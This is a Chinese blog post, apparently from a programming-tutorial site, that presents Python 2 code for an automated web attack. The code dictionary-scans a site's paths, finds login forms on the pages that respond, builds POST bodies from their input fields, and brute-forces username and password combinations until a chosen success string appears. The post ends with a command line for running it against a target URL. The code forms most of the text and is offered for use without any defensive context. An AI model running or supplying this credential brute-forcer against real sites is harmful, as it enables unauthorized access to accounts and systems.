python遍歷路徑破解表單的示例

更新時間：2020年11月21日 10:22:21 作者：Misaki''s

這篇文章主要介紹了python遍歷路徑破解表單的示例，幫助大家更好的理解和使用python，感興趣的朋友可以了解下

首先是利用python遍歷路徑，采用字典爆破的形式，當然如果只是單純的爆破路徑，簡單寫一個多線程腳本就行了。這里考慮如何對爆破到的路徑進行第二步利用，此處嘗試對猜解到的路徑進行表單發(fā)現(xiàn)及登陸爆破處理。

首先就是路徑爆破，采用多線程隊列，爆破路徑，判斷形式為200響應碼。

    while not self._queue.empty():
      queue = self._queue.get(timeout=0.5)
      try:
        r = requests.get(self.url+queue,timeout=5, headers=self.headers)
        if r.status_code == 200:
          print "[200] %s" %(queue)
          soup = BeautifulSoup(r.content,'html.parser')
          if soup.find('form'):
            self.brute(soup, queue)

猜解到路徑后交給brute方法處理，方法實現(xiàn)了一個css選擇器，獲取form表單中的input字段標簽，提取標簽參數(shù)組合成post參數(shù)值，然后提取表單中的action跳轉頁面，如沒有頁面默認在當前表單頁提交。

input = soup.select("form input")
      for i in input:
        try:
          if i.attrs['type'] == "hidden":
            name, value = i.attrs['name'], i.attrs['value']
            list_post.append(name+'='+value)
          elif i.attrs['type'] == 'password':
            name = i.attrs['name']
            list_post.append(name+'=$$$')
          else:
            name = i.attrs['name']
            list_post.append(name+'=%%%')
        except:
          continue
      for i in list_post:
        post = post + i + '&'
      action = soup.find_all('form')
      for i in action:
        if i['action']:
          actiontag = i['action']
        else:
          actiontag = queue
      self.payload(post, actiontag)

獲取參數(shù)值后，交給payload方法處理登陸，采用requests庫的session登陸。獲取cookie，先采用session請求獲取cookie后，再采用session攜帶cookie進行請求提交。然后對輸入的驗證值進行判斷是否為登陸成功。

    for name in self.username():
      post_user = post.replace('%%%',name.strip())
      for pwd in self.password():
        post_pwd = post_user.replace('$$$',pwd.strip())
        session = requests.Session()
        session.get(self.url+'/'+action, headers=self.headers, verify=False)
        r = session.post(self.url+'/'+action, data=post_pwd, headers=self.headers, verify=False)
        if self.word in r.content:
          print '[username] %s' %name +'\r' + '[password] %s' %pwd
          return

為了判斷是否登陸成功，采用的人為輸入判斷字符串的形式。也就是腳本執(zhí)行形式為

python xxx.py http://xxxx.com xxxxx

以上就是python遍歷路徑破解表單的示例的詳細內(nèi)容，更多關于python 破解表單的資料請關注腳本之家其它相關文章！

您可能感興趣的文章:

Python不改變Excel單元格樣式方式—xls和xlsx兩種格式
這篇文章主要介紹了Python不改變Excel單元格樣式方式—xls和xlsx兩種格式，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2023-06-06
如何利用opencv判斷兩張圖片是否相同詳解
這篇文章主要給大家介紹了關于如何利用opencv判斷兩張圖片是否相同的相關資料,OpenCV是一個開源的計算機視覺庫,它提供了很多函數(shù),這些函數(shù)非常高效地實現(xiàn)了計算機視覺算法,需要的朋友可以參考下
2021-07-07
python用opencv將標注提取畫框到對應的圖像中
這篇文章主要介紹了python用opencv將標注提取畫框到對應的圖像中，文章圍繞主題展開詳細的內(nèi)容介紹，具有一定的參考價值，需要的小伙伴可以參考一下
2022-08-08
基于Python+Flask實現(xiàn)一個簡易網(wǎng)頁驗證碼登錄系統(tǒng)案例
當今的互聯(lián)網(wǎng)世界中,為了防止惡意訪問,許多網(wǎng)站在登錄和注冊表單中都采用了驗證碼技術,驗證碼可以防止機器人自動提交表單,確保提交行為背后有一個真實的人類用戶,本文將向您展示如何使用Python的Flask框架來創(chuàng)建一個簡單的驗證碼登錄系統(tǒng)
2023-09-09
Pytorch訓練模型得到輸出后計算F1-Score 和AUC的操作
這篇文章主要介紹了Pytorch訓練模型得到輸出后計算F1-Score 和AUC的操作，具有很好的參考價值，希望對大家有所幫助。如有錯誤或未考慮完全的地方，望不吝賜教
2021-05-05
python利用pandas和csv包向一個csv文件寫入或追加數(shù)據(jù)
這篇文章主要給大家介紹了關于python利用pandas和csv包向一個csv文件寫入或追加數(shù)據(jù)的相關資料,我們越來越多的使用pandas進行數(shù)據(jù)處理,有時需要向一個已經(jīng)存在的csv文件寫入數(shù)據(jù),需要的朋友可以參考下
2023-07-07
Python 實戰(zhàn)開發(fā)校園管理系統(tǒng)詳細流程
讀萬卷書不如行萬里路，只學書上的理論是遠遠不夠的，只有在實戰(zhàn)中才能獲得能力的提升，本篇文章手把手帶你用Python開發(fā)一套校園管理系統(tǒng)，包含各種人員，如教師、學生等。學校的系統(tǒng)通常還包括一些課程的信息,大家可以在過程中查缺補漏，提升水平
2021-10-10
python向已存在的excel中新增表,不覆蓋原數(shù)據(jù)的實例
下面小編就為大家分享一篇python向已存在的excel中新增表,不覆蓋原數(shù)據(jù)的實例，具有很好超參考價值，希望對大家有所幫助。一起跟隨小編過來看看吧
2018-05-05
python配置mssql連接的方法
這篇文章主要介紹了python配置mssql連接的方法,需要的朋友可以參考下
2021-06-06
關于Python3的import問題(pycharm可以運行命令行import錯誤)
這篇文章主要介紹了關于Python3的import問題(pycharm可以運行命令行import錯誤),文中通過示例代碼介紹的非常詳細，對大家的學習或者工作具有一定的參考學習價值，需要的朋友們下面隨著小編來一起學習學習吧
2020-11-11